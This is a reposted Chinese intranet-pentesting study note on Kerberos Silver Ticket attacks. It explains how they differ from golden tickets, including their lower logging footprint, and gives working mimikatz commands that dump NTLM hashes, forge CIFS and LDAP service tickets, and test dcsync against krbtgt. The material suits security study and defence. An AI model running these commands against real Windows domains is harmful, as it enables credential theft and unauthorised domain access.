【内网学习笔记】29、白银票据(白银票据利用)

网友投稿 894 2022-10-05


【内网学习笔记】29、白银票据(白银票据利用)

0、前言

白银票据(Sliver Ticket) 不同于黄金票据(Golden Ticket)

Kerberos 协议详解:KDC 交互,因此没有了 Kerberos 认证协议里的前 4 步,通过伪造的票据授予服务 TGS 生成伪造的服务票据 ST 直接与服务器 Server 进行交互。

白银票据与黄金票据的区别:

1、白银票据不经过 KDC,因此白银票据日志相对于黄金票据会更少,同时白银票据的日志都在目标服务器上,域控上不会有日志

2、白银票据利用服务账户的哈希值,不同于黄金票据利用 krbtgt 账户的哈希值,因此白银票据更加隐蔽,但白银票据的权限就远不如黄金票据的权限了

想利用白银票据需要先知道以下信息:

域名 域 SID 目标服务器的 FQDN 即完整的域名 可利用的服务 服务账户的 NTLM 哈希 伪造的用户名即任意用户名

1、伪造 CIFS 服务权限

CIFS 服务常用于 Windows 主机之间的文件共享,首先使用 mimikatz 获取服务账户的 NTLM 哈希,这里使用的 Username 为 DC$ 的 NTLM 哈希

.\mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit

得到 HASH 后,清空当前系统中的票据,防止其他票据干扰

klist purge # 或者在 mimikatz 里清除 kerberos::purge

使用 mimikatz 生成伪造的白银票据

.\mimikatz.exe "kerberos::golden /user:t /domain:teamssix.com /sid:S-1-5-21-284927032-1122706408-2778656994 /target:dc /rc4:ef9e49a41feaa171f642016fd4cb7e7a /service:cifs /ptt" exit

在伪造票据后,使用 dir 命令就能读取到目标的共享服务了。

2、伪造 LDAP 服务权限

首先判断当前权限是否可以使用 dcsync 域控进行同步

.\mimikatz.exe "lsadump::dcsync /dc:dc /domain:teamssix.com /user:krbtgt" exit

如果返回 ERROR 说明当前权限不能进行 dcsync 操作

接下来生成 LDAP 服务的白银票据

.\mimikatz.exe "kerberos::golden /user:t /domain:teamssix.com /sid:S-1-5-21-284927032-1122706408-2778656994 /target:dc /rc4:ef9e49a41feaa171f642016fd4cb7e7a /service:ldap /ptt" exit


版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

上一篇:网络安全专业“术语”你知道几个?网络安全入门教程(网络安全的相关知识)
下一篇:Java SerialVersionUID作用详解
相关文章

 发表评论

暂时没有评论,来抢沙发吧~